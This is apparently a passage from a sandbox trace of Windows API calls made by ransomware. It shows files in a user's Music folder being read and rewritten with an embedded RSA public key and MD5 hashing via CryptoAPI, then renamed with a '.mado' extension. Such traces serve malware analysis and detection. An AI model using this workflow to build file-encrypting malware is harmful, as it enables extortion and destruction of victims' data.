RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe250 [0204.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe268 [0204.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe238 [0204.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe250 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe250 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bdb0 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bb80 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe250 | out: hHeap=0x2c0000) returned 1 [0204.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe268 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe238 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe220 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eaf8 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.405] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0xe0fc, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0xe0fc, lpOverlapped=0x0) returned 1 [0204.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0204.405] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe101, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.405] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.405] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.406] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.406] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.406] CloseHandle (hObject=0x63c) returned 1 [0204.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.407] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eMlVnXHfvcxzzTcr.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\emlvnxhfvcxzztcr.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eMlVnXHfvcxzzTcr.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\emlvnxhfvcxzztcr.mp3.mado")) returned 1 [0204.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.408] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.409] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33511550, ftCreationTime.dwHighDateTime=0x1d5e284, ftLastAccessTime.dwLowDateTime=0x12c61b00, ftLastAccessTime.dwHighDateTime=0x1d5da41, ftLastWriteTime.dwLowDateTime=0x12c61b00, ftLastWriteTime.dwHighDateTime=0x1d5da41, nFileSizeHigh=0x0, nFileSizeLow=0x77e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FOZ GswnS.m4a", cAlternateFileName="FOZGSW~1.M4A")) returned 1 [0204.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FOZ GswnS.m4a") returned=".m4a" [0204.409] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FOZ GswnS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\foz gswns.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.410] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=30695) returned 1 [0204.410] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.412] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x77c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.412] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.414] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.414] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x77e7, lpOverlapped=0x0) returned 1 [0204.414] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.415] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.415] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.415] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.415] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.416] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.416] GetLastError () returned 0x0 [0204.416] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.416] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.416] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.416] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.416] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x77f0) returned 0x3b74b68 [0204.416] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6eaf8 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe220 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b806a8 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe238 [0204.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe268 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.417] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b81690 [0204.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe268 | out: hHeap=0x2c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe280 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe268 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bec8 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bb80 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe268 | out: hHeap=0x2c0000) returned 1 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.418] GetCurrentThreadId () returned 0x600 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71870 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.418] RtlAllocateHeap 